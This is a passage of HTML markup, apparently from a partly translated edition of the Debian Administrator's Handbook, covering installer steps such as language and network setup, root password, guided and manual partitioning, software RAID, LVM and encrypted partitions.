+              class="indexterm"></a><div
+              class="para">
+				The fundamental difference between 32 and 64 bit systems is the size of memory addresses. In theory, a 32 bit system can not work with more than 4 GB of RAM (2<sup>32</sup> bytes). In practice, it is possible to work around this limitation by using the <code
+                class="literal">686-pae</code> kernel variant, so long as the processor handles the PAE (Physical Address Extension) functionality. Using it does have a notable influence on system performance, however. This is why it is useful to use the 64 bit mode on a server with a large amount of RAM.
+			</div><div
+              class="para">
+				For an office computer (where a few percent difference in performance is negligible), you must keep in mind that some proprietary programs are not available in 64 bit versions (such as Skype, for example). It is technically possible to make them work on 64 bit systems, but you have to install the 32 bit versions of all the necessary libraries (see <a
+                class="xref"
+                href="sect.manipulating-packages-with-dpkg.html#sect.multi-arch">5.4.5 – „Multi-Arch Support“</a>), and sometimes to use <code
+                class="command">setarch</code> or <code
+                class="command">linux32</code> (in the <span
+                class="pkg pkg">util-linux</span> package) to trick applications regarding the nature of the system. <a
+                id="id-1.7.12.2.4.6.5"
+                class="indexterm"></a> <a
+                id="id-1.7.12.2.4.6.6"
+                class="indexterm"></a>
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Installation alongside an existing Windows system</strong></p></div></div></div><a
+              id="id-1.7.12.2.5.2"
+              class="indexterm"></a><div
+              class="para">
+				If the computer is already running Windows, it is not necessary to delete the system in order to install Debian. You can have both systems at once, each installed on a separate disk or partition, and choose which to start when booting the computer. This configuration is often called “dual boot”, and the Debian installation system can set it up. This is done during the hard drive partitioning stage of installation and while setting up the bootloader (see the sidebars <a
+                class="xref"
+                href="sect.installation-steps.html#sidebar.shrinking-partition"><span
+                  class="emphasis"><em>IN PRACTICE</em></span> Shrinking a Windows partition</a> and <a
+                class="xref"
+                href="sect.installation-steps.html#sidebar.bootloader-dual-boot"><span
+                  class="emphasis"><em>BEWARE</em></span> Bootloader and dual boot</a>).
+			</div><div
+              class="para">
+				If you already have a working Windows system, you can even avoid using a CD-ROM; Debian offers a Windows program that will download a light Debian installer and set it up on the hard disk. You then only need to reboot the computer and choose between normal Windows boot or booting the installation program. You can also find it on a dedicated website with a rather explicit name… <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://ftp.debian.org/debian/tools/win32-loader/stable/">http://ftp.debian.org/debian/tools/win32-loader/stable/</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.goodbye-microsoft.com/">http://www.goodbye-microsoft.com/</a></div>
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Bootloader</strong></p></div></div></div><a
+              id="id-1.7.12.2.6.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.2.6.3"
+              class="indexterm"></a><a
+              id="id-1.7.12.2.6.4"
+              class="indexterm"></a><div
+              class="para">
+				The bootloader is a low-level program that is responsible for booting the Linux kernel just after the BIOS passes off its control. To handle this task, it must be able to locate the Linux kernel to boot on the disk. On the i386 and amd64 architectures, the two most used programs to perform this task are LILO, the older of the two, and GRUB, its modern replacement. Isolinux and Syslinux are alternatives frequently used to boot from removable media.
+			</div></div><div
+            class="para">
+				Each menu entry hides a specific boot command line, which can be configured as needed by pressing the <span
+              class="keycap"><strong>TAB</strong></span> key before validating the entry and booting. The “Help” menu entry displays the old command line interface, where the <span
+              class="keycap"><strong>F1</strong></span> to <span
+              class="keycap"><strong>F10</strong></span> keys display different help screens detailing the various options available at the prompt. You will rarely need to use this option except in very specific cases.
+			</div><div
+            class="para">
+				The “expert” mode (accessible in the “Advanced options” menu) details all possible options in the process of installation, and allows navigation between the various steps without them happening automatically in sequence. Be careful, this very verbose mode can be confusing due to the multitude of configuration choices that it offers.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.2.9"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-boot.png"
+                  alt="Boot screen" /></div></div><p
+              class="title"><strong>Obrázek 4.1. Boot screen</strong></p></div><div
+            class="para">
+				Once booted, the installation program guides you step by step throughout the process. This section presents each of these steps in detail. Here we follow the process of an installation from an amd64 DVD-ROM (more specifically, the rc3 version of the installer for Stretch); <span
+              class="emphasis"><em>netinst</em></span> installations, as well as the final release of the installer, may look slightly different. We will also address installation in graphical mode, but the only difference from “classic” (text-mode) installation is in the visual appearance.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-lang"></a>4.2.2. Selecting the language</h3></div></div></div><a
+            id="id-1.7.12.3.2"
+            class="indexterm"></a><div
+            class="para">
+				The installation program begins in English, but the first step allows the user to choose the language that will be used in the rest of the process. Choosing French, for example, will provide an installation entirely translated into French (and a system configured in French as a result). This choice is also used to define more relevant default choices in subsequent stages (notably the keyboard layout).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Navigating with the keyboard</strong></p></div></div></div><div
+              class="para">
+				Some steps in the installation process require you to enter information. These screens have several areas that may “have focus” (text entry area, checkboxes, list of choices, OK and Cancel buttons), and the <span
+                class="keycap"><strong>TAB</strong></span> key allows you to move from one to another.
+			</div><div
+              class="para">
+				In graphical mode, you can use the mouse as you would normally on an installed graphical desktop.
+			</div></div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.3.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-lang.png"
+                  alt="Selecting the language" /></div><div
+                class="mediaobject"><img
+                  src="images/inst-lang-txt.png"
+                  alt="Selecting the language" /></div></div><p
+              class="title"><strong>Obrázek 4.2. Selecting the language</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-country"></a>4.2.3. Selecting the country</h3></div></div></div><a
+            id="id-1.7.12.4.2"
+            class="indexterm"></a><div
+            class="para">
+				The second step consists in choosing your country. Combined with the language, this information enables the program to offer the most appropriate keyboard layout. This will also influence the configuration of the time zone. In the United States, a standard QWERTY keyboard is suggested, and a choice of appropriate time zones is offered.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.4.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-country.png"
+                  alt="Selecting the country" /></div><div
+                class="mediaobject"><img
+                  src="images/inst-country-txt.png"
+                  alt="Selecting the country" /></div></div><p
+              class="title"><strong>Obrázek 4.3. Selecting the country</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-keyboard"></a>4.2.4. Selecting the keyboard layout</h3></div></div></div><a
+            id="id-1.7.12.5.2"
+            class="indexterm"></a><a
+            id="id-1.7.12.5.3"
+            class="indexterm"></a><div
+            class="para">
+				The proposed “American English” keyboard corresponds to the usual QWERTY layout.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.5.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-keyboard.png"
+                  alt="Choice of keyboard" /></div><div
+                class="mediaobject"><img
+                  src="images/inst-keyboard-txt.png"
+                  alt="Choice of keyboard" /></div></div><p
+              class="title"><strong>Obrázek 4.4. Choice of keyboard</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-detect-hardware"></a>4.2.5. Detecting Hardware</h3></div></div></div><div
+            class="para">
+				This step is completely automatic in the vast majority of cases. The installer detects your hardware, and tries to identify the CD-ROM drive used in order to access its content. It loads the modules corresponding to the various hardware components detected, and then “mounts” the CD-ROM in order to read it. The previous steps were completely contained in the boot image included on the CD, a file of limited size and loaded into memory by the BIOS when booting from the CD.
+			</div><div
+            class="para">
+				The installer can work with the vast majority of drives, especially standard ATAPI peripherals (sometimes called IDE and EIDE). However, if detection of the CD-ROM reader fails, the installer offers the choice to load a kernel module (for instance from a USB key) corresponding to the CD-ROM driver.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-load-components"></a>4.2.6. Loading Components</h3></div></div></div><div
+            class="para">
+				With the contents of the CD now available, the installer loads all the files necessary to continue with its work. This includes additional drivers for the remaining hardware (especially the network card), as well as all the components of the installation program.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-detect-network"></a>4.2.7. Detecting Network Hardware</h3></div></div></div><div
+            class="para">
+				This automatic step tries to identify the network card and load the corresponding module. If automatic detection fails, you can manually select the module to load. If no module works, it is possible to load a specific module from a removable device. This last solution is usually only needed if the appropriate driver is not included in the standard Linux kernel, but available elsewhere, such as the manufacturer's website.
+			</div><div
+            class="para">
+				This step must absolutely be successful for <span
+              class="emphasis"><em>netinst</em></span> installations, since the Debian packages must be loaded from the network.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-network-config"></a>4.2.8. Configuring the Network</h3></div></div></div><a
+            id="id-1.7.12.9.2"
+            class="indexterm"></a><a
+            id="id-1.7.12.9.3"
+            class="indexterm"></a><div
+            class="para">
+				In order to automate the process as much as possible, the installer attempts an automatic network configuration by DHCP (for IPv4) and by IPv6 network discovery. If this fails, it offers more choices: try again with a normal DHCP configuration, attempt DHCP configuration by declaring the name of the machine, or set up a static network configuration.
+			</div><div
+            class="para">
+				This last option requires an IP address, a subnet mask, an IP address for a potential gateway, a machine name, and a domain name.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Configuration without DHCP</strong></p></div></div></div><div
+              class="para">
+				If the local network is equipped with a DHCP server that you do not wish to use because you prefer to define a static IP address for the machine during installation, you can add the <strong
+                class="userinput"><code>netcfg/use_dhcp=false</code></strong> option when booting from the CD-ROM. You just need to go to the desired menu entry by pressing the <span
+                class="keycap"><strong>TAB</strong></span> key and add the desired option before pressing the <span
+                class="keycap"><strong>Enter</strong></span> key.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BEWARE</em></span> Do not improvise</strong></p></div></div></div><div
+              class="para">
+				Many local area networks are based on an implicit assumption that all machines can be trusted, and inadequate configuration of a single computer will often perturb the whole network. As a result, do not connect your machine to a network without first agreeing with its administrator on the appropriate settings (for example, the IP address, netmask, and broadcast address).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.10"></a>4.2.9. Administrator Password</h3></div></div></div><a
+            id="id-1.7.12.10.2"
+            class="indexterm"></a><div
+            class="para">
+				The super-user root account, reserved for the machine's administrator, is automatically created during installation; this is why a password is requested. The installer also asks for a confirmation of the password to prevent any input error which would later be difficult to amend.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.10.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-rootpw.png"
+                  alt="Administrator Password" /></div></div><p
+              class="title"><strong>Obrázek 4.5. Administrator Password</strong></p></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> Administrator password</strong></p></div></div></div><div
+              class="para">
+				The root user's password should be long (8 characters or more) and impossible to guess. Indeed, any computer (and a fortiori any server) connected to the Internet is regularly targeted by automated connection attempts with the most obvious passwords. Sometimes it may even be subject to dictionary attacks, in which many combinations of words and numbers are tested as password. Avoid using the names of children or parents, dates of birth, etc.: many of your co-workers might know them, and you rarely want to give them free access to the computer in question.
+			</div><div
+              class="para">
+				These remarks are equally applicable for other user passwords, but the consequences of a compromised account are less drastic for users without administrative rights.
+			</div><div
+              class="para">
+				If inspiration is lacking, do not hesitate to use password generators, such as <code
+                class="command">pwgen</code> (in the package of the same name).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.11"></a>4.2.10. Creating the First User</h3></div></div></div><div
+            class="para">
+				Debian also imposes the creation of a standard user account so that the administrator doesn't get into the bad habit of working as root. The precautionary principle essentially means that each task is performed with the minimum required rights, in order to limit the damage caused by human error. This is why the installer will ask for the complete name of this first user, their username, and their password (twice, to prevent the risk of erroneous input).
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.11.3"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-username.png"
+                  alt="Name of the first user" /></div></div><p
+              class="title"><strong>Obrázek 4.6. Name of the first user</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-clock-config"></a>4.2.11. Configuring the Clock</h3></div></div></div><div
+            class="para">
+				If the network is available, the system's internal clock is updated (in a one-shot way) from an NTP server. This way the timestamps on logs will be correct from the first boot. For them to remain consistently precise over time, an NTP daemon needs to be set up after initial installation (see <a
+              class="xref"
+              href="sect.config-misc.html#sect.time-synchronization">8.9.2 – „Time Synchronization“</a>).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-detect-disks"></a>4.2.12. Detecting Disks and Other Devices</h3></div></div></div><div
+            class="para">
+				This step automatically detects the hard drives on which Debian may be installed. They will be presented in the next step: partitioning.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-partman"></a>4.2.13. Starting the Partitioning Tool</h3></div></div></div><a
+            id="id-1.7.12.14.2"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Uses of partitioning</strong></p></div></div></div><div
+              class="para">
+				Partitioning, an indispensable step in installation, consists in dividing the available space on the hard drives (each subdivision thereof being called a “partition”) according to the data to be stored on it and the use for which the computer is intended. This step also includes choosing the filesystems to be used. All of these decisions will have an influence on performance, data security, and the administration of the server.
+			</div></div><div
+            class="para">
+				The partitioning step is traditionally difficult for new users. It is necessary to define the various portions of the disks (or “partitions”) on which the Linux filesystems and virtual memory (swap) will be stored. This task is complicated if another operating system that you want to keep is already on the machine. Indeed, you will then have to make sure that you do not alter its partitions (or that you resize them without causing damage).
+			</div><div
+            class="para">
+				Fortunately, the partitioning software has a “guided” mode which recommends partitions for the user to make — in most cases, you can simply validate the software's suggestions.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.14.6"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-partman.png"
+                  alt="Choice of partitioning mode" /></div></div><p
+              class="title"><strong>Obrázek 4.7. Choice of partitioning mode</strong></p></div><div
+            class="para">
+				The first screen in the partitioning tool offers the choice of using an entire hard drive to create various partitions. For a (new) computer which will solely use Linux, this option is clearly the simplest, and you can choose the option “Guided - use entire disk”. If the computer has two hard drives for two operating systems, setting one drive for each is also a solution that can facilitate partitioning. In both of these cases, the next screen offers to choose the disk where Linux will be installed by selecting the corresponding entry (for example, “SCSI3 (0,0,0) (sda) - 17.2 GB ATA VBOX HARDDISK”). You then start guided partitioning.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.14.8"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-partman-disk.png"
+                  alt="Disk to use for guided partitioning" /></div></div><p
+              class="title"><strong>Obrázek 4.8. Disk to use for guided partitioning</strong></p></div><div
+            class="para">
+				Guided partitioning can also set up LVM logical volumes instead of partitions (see below). Since the remainder of the operation is the same, we will not go over the option “Guided - use entire disk and set up LVM” (encrypted or not).
+			</div><div
+            class="para">
+				In other cases, when Linux must work alongside other already existing partitions, you need to choose manual partitioning.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-autopartman-mode"></a>4.2.13.1. Guided partitioning</h4></div></div></div><a
+              id="id-1.7.12.14.11.2"
+              class="indexterm"></a><div
+              class="para">
+					The guided partitioning tool offers three partitioning methods, which correspond to different usages.
+				</div><div
+              class="figure"><a
+                xmlns=""
+                id="id-1.7.12.14.11.4"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/inst-autopartman-mode.png"
+                    alt="Guided partitioning" /></div></div><p
+                class="title"><strong>Obrázek 4.9. Guided partitioning</strong></p></div><div
+              class="para">
+					The first method is called “All files in one partition”. The entire Linux system tree is stored in a single filesystem, corresponding to the root <code
+                class="filename">/</code> directory. This simple and robust partitioning fits perfectly for personal or single-user systems. In fact, two partitions will be created: the first will house the complete system, the second the virtual memory (swap).
+				</div><div
+              class="para">
+					The second method, “Separate <code
+                class="filename">/home/</code> partition”, is similar, but splits the file hierarchy in two: one partition contains the Linux system (<code
+                class="filename">/</code>), and the second contains “home directories” (meaning user data, in files and subdirectories available under <code
+                class="filename">/home/</code>).
+				</div><div
+              class="para">
+					The last partitioning method, called “Separate <code
+                class="filename">/home</code>, <code
+                class="filename">/var</code>, and <code
+                class="filename">/tmp</code> partitions”, is appropriate for servers and multi-user systems. It divides the file tree into many partitions: in addition to the root (<code
+                class="filename">/</code>) and user accounts (<code
+                class="filename">/home/</code>) partitions, it also has partitions for server software data (<code
+                class="filename">/var/</code>), and temporary files (<code
+                class="filename">/tmp/</code>). These divisions have several advantages. Users can not lock up the server by consuming all available hard drive space (they can only fill up <code
+                class="filename">/tmp/</code> and <code
+                class="filename">/home/</code>). The daemon data (especially logs) can no longer clog up the rest of the system.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> Choosing a filesystem</strong></p></div></div></div><a
+                id="id-1.7.12.14.11.8.2"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.11.8.3"
+                class="indexterm"></a><div
+                class="para">
+					A filesystem defines the way in which data is organized on the hard drive. Each existing filesystem has its merits and limitations. Some are more robust, others more effective: if you know your needs well, choosing the most appropriate filesystem is possible. Various comparisons have already been made; it seems that <span
+                  class="emphasis"><em>ReiserFS</em></span> is particularly efficient for reading many small files; <span
+                  class="emphasis"><em>XFS</em></span>, in turn, works faster with large files. <span
+                  class="emphasis"><em>Ext4</em></span>, the default filesystem for Debian, is a good compromise, based on the three previous versions of filesystems historically used in Linux (<span
+                  class="emphasis"><em>ext</em></span>, <span
+                  class="emphasis"><em>ext2</em></span> and <span
+                  class="emphasis"><em>ext3</em></span>). <span
+                  class="emphasis"><em>Ext4</em></span> overcomes certain limitations of <span
+                  class="emphasis"><em>ext3</em></span> and is particularly appropriate for very large capacity hard drives. Another option would be to experiment with the very promising <span
+                  class="emphasis"><em>btrfs</em></span>, which includes numerous features that require, to this day, the use of LVM and/or RAID.
+				</div><div
+                class="para">
+					A journalized filesystem (such as <span
+                  class="emphasis"><em>ext3</em></span>, <span
+                  class="emphasis"><em>ext4</em></span>, <span
+                  class="emphasis"><em>btrfs</em></span>, <span
+                  class="emphasis"><em>reiserfs</em></span>, or <span
+                  class="emphasis"><em>xfs</em></span>) takes special measures to make it possible to return to a prior consistent state after an abrupt interruption without completely analyzing the entire disk (as was the case with the <span
+                  class="emphasis"><em>ext2</em></span> system). This functionality is carried out by filling in a journal that describes the operations to conduct prior to actually executing them. If an operation is interrupted, it will be possible to “replay” it from the journal. Conversely, if an interruption occurs during an update of the journal, the last requested change is simply ignored; the data being written could be lost, but since the data on the disk has not changed, they have remained coherent. This is nothing more nor less than a transactional mechanism applied to the filesystem.
+				</div></div><div
+              class="para">
+					After choosing the type of partition, the software calculates a suggestion, and describes it on the screen; the user can then modify it if needed. You can, in particular, choose another filesystem if the standard choice (<span
+                class="emphasis"><em>ext4</em></span>) isn't appropriate. In most cases, however, the proposed partitioning is reasonable and it can be accepted by selecting the “Finish partitioning and write changes to disk” entry.
+				</div><div
+              class="figure"><a
+                xmlns=""
+                id="id-1.7.12.14.11.10"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/inst-partman-validation.png"
+                    alt="Validating partitioning" /></div></div><p
+                class="title"><strong>Obrázek 4.10. Validating partitioning</strong></p></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.manual-partitioning"></a>4.2.13.2. Manual Partitioning</h4></div></div></div><a
+              id="id-1.7.12.14.12.2"
+              class="indexterm"></a><div
+              class="para">
+					Manual partitioning allows greater flexibility, allowing the user to choose the purpose and size of each partition. Furthermore, this mode is unavoidable if you wish to use software RAID.
+				</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.shrinking-partition"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>IN PRACTICE</em></span> Shrinking a Windows partition</strong></p></div></div></div><a
+                id="id-1.7.12.14.12.4.2"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.12.4.3"
+                class="indexterm"></a><div
+                class="para">
+					To install Debian alongside an existing operating system (Windows or other), you must have some available hard drive space that is not being used by the other system in order to be able to create the partitions dedicated to Debian. In most cases, this means shrinking a Windows partition and reusing the freed space.
+				</div><div
+                class="para">
+					The Debian installer allows this operation when using the manual mode for partitioning. You only need to choose the Windows partition and enter its new size (this works the same with both FAT and NTFS partitions).
+				</div></div><div
+              class="para">
+					The first screen displays the available disks, their partitions, and any possible free space that has not yet been partitioned. You can select each displayed element; pressing the <span
+                class="keycap"><strong>Enter</strong></span> key then gives a list of possible actions.
+				</div><div
+              class="para">
+					You can erase all partitions on a disk by selecting it.
+				</div><div
+              class="para">
+					When selecting free space on a disk, you can manually create a new partition. You can also do this with guided partitioning, which is an interesting solution for a disk that already contains another operating system, but which you may wish to partition for Linux in a standard manner. See <a
+                class="xref"
+                href="sect.installation-steps.html#sect.install-autopartman-mode">4.2.13.1 – „Guided partitioning“</a> for more details on guided partitioning.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> Mount point</strong></p></div></div></div><a
+                id="id-1.7.12.14.12.8.2"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.12.8.3"
+                class="indexterm"></a><div
+                class="para">
+					The mount point is the directory tree that will house the contents of the filesystem on the selected partition. Thus, a partition mounted at <code
+                  class="filename">/home/</code> is traditionally intended to contain user data.
+				</div><div
+                class="para">
+					When this directory is named “<code
+                  class="filename">/</code>”, it is known as the <span
+                  class="emphasis"><em>root</em></span> of the file tree, and therefore the root of the partition that will actually host the Debian system.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> Virtual memory, swap</strong></p></div></div></div><a
+                id="id-1.7.12.14.12.9.2"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.12.9.3"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.12.9.4"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.12.9.5"
+                class="indexterm"></a><div
+                class="para">
+					Virtual memory allows the Linux kernel, when lacking sufficient memory (RAM), to free a bit of storage by storing the parts of the RAM that have been inactive for some time on the swap partition of the hard disk.
+				</div><div
+                class="para">
+					To simulate the additional memory, Windows uses a swap file that is directly contained in a filesystem. Conversely, Linux uses a partition dedicated to this purpose, hence the term “swap partition”.
+				</div></div><div
+              class="para">
+					When choosing a partition, you can indicate the manner in which you are going to use it:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							format it and include it in the file tree by choosing a mount point;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							use it as a swap partition;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							make it into a “physical volume for encryption” (to protect the confidentiality of data on certain partitions, see below);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							make it a “physical volume for LVM” (this concept is discussed in greater detail later in this chapter);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							use it as a RAID device (see later in this chapter);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							you can also choose not to use it, and therefore leave it unchanged.
+						</div></li></ul></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-software-raid"></a>4.2.13.3. Configuring Multidisk Devices (Software RAID)</h4></div></div></div><a
+              id="id-1.7.12.14.13.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.13.3"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.13.4"
+              class="indexterm"></a><div
+              class="para">
+					Some types of RAID allow the duplication of information stored on hard drives to prevent data loss in the event of a hardware problem affecting one of them. Level 1 RAID keeps a simple, identical copy (mirror) of a hard drive on another drive, while level 5 RAID splits redundant data over several disks, thus allowing the complete reconstruction of a failing drive.
+				</div><div
+              class="para">
+					We will only describe level 1 RAID, which is the simplest to implement. The first step involves creating two partitions of identical size located on two different hard drives, and to label them “physical volume for RAID”.
+				</div><div
+              class="para">
+					You must then choose “Configure software RAID” in the partitioning tool to combine these two partitions into a new virtual disk and select “Create MD device” in the configuration screen. You then need to answer a series of questions about this new device. The first question asks about the RAID level to use, which in our case will be “RAID1”. The second question asks about the number of active devices — two in our case, which is the number of partitions that need to be included in this MD device. The third question is about the number of spare devices — 0; we have not planned any additional disk to take over for a possible defective disk. The last question requires you to choose the partitions for the RAID device — these would be the two that we have set aside for this purpose (make sure you only select the partitions that explicitly mention “raid”).
+				</div><div
+              class="para">
+					Back to the main menu, a new virtual “RAID” disk appears. This disk is presented with a single partition which can not be deleted, but whose use we can choose (just like for any other partition).
+				</div><div
+              class="para">
+					For further details on RAID functions, please refer to <a
+                class="xref"
+                href="advanced-administration.html#sect.raid-soft">12.1.1 – „Software RAID“</a>.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-lvm"></a>4.2.13.4. Configuring the Logical Volume Manager (LVM)</h4></div></div></div><a
+              id="id-1.7.12.14.14.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.14.3"
+              class="indexterm"></a><div
+              class="para">
+					LVM allows you to create “virtual” partitions that span over several disks. The benefits are twofold: the size of the partitions are no longer limited by individual disks but by their cumulative volume, and you can resize existing partitions at any time, possibly after adding an additional disk when needed.
+				</div><div
+              class="para">
+					LVM uses a particular terminology: a virtual partition is a “logical volume”, which is part of a “volume group”, or an association of several “physical volumes”. Each of these terms in fact corresponds to a “real” partition (or a software RAID device).
+				</div><a
+              id="id-1.7.12.14.14.6"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.14.7"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.14.8"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.14.9"
+              class="indexterm"></a><div
+              class="para">
+					This technique works in a very simple way: each volume, whether physical or logical, is split into blocks of the same size, which are made to correspond by LVM. The addition of a new disk will cause the creation of a new physical volume, and these new blocks can be associated to any volume group. All of the partitions in the volume group that is thus expanded will have additional space into which they can extend.
+				</div><div
+              class="para">
+					The partitioning tool configures LVM in several steps. First you must create on the existing disks the partitions that will be “physical volumes for LVM”. To activate LVM, you need to choose “Configure the Logical Volume Manager (LVM)”, then on the same configuration screen “Create a volume group”, to which you will associate the existing physical volumes. Finally, you can create logical volumes within this volume group. Note that the automatic partitioning system can perform all these steps automatically.
+				</div><div
+              class="para">
+					In the partitioning menu, each physical volume will appear as a disk with a single partition which can not be deleted, but that you can use as desired.
+				</div><div
+              class="para">
+					The usage of LVM is described in further detail in <a
+                class="xref"
+                href="advanced-administration.html#sect.lvm">12.1.2 – „LVM“</a>.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.7.12.14.15"></a>4.2.13.5. Setting Up Encrypted Partitions</h4></div></div></div><a
+              id="id-1.7.12.14.15.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.15.3"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.15.4"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.15.5"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.15.6"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.15.7"
+              class="indexterm"></a><div
+              class="para">
+					To guarantee the confidentiality of your data, for instance in the event of the loss or theft of your computer or a hard drive, it is possible to encrypt the data on some partitions. This feature can be added underneath any filesystem, since, as for LVM, Linux (and more particularly the dm-crypt driver) uses the Device Mapper to create a virtual partition (whose content is protected) based on an underlying partition that will store the data in an encrypted form (thanks to LUKS, Linux Unified Key Setup, a standard format that enables the storage of encrypted data as well as meta-information that indicates the encryption algorithms used).
+				</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.encrypted-swap-partition"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> Encrypted swap partition</strong></p></div></div></div><div
+                class="para">
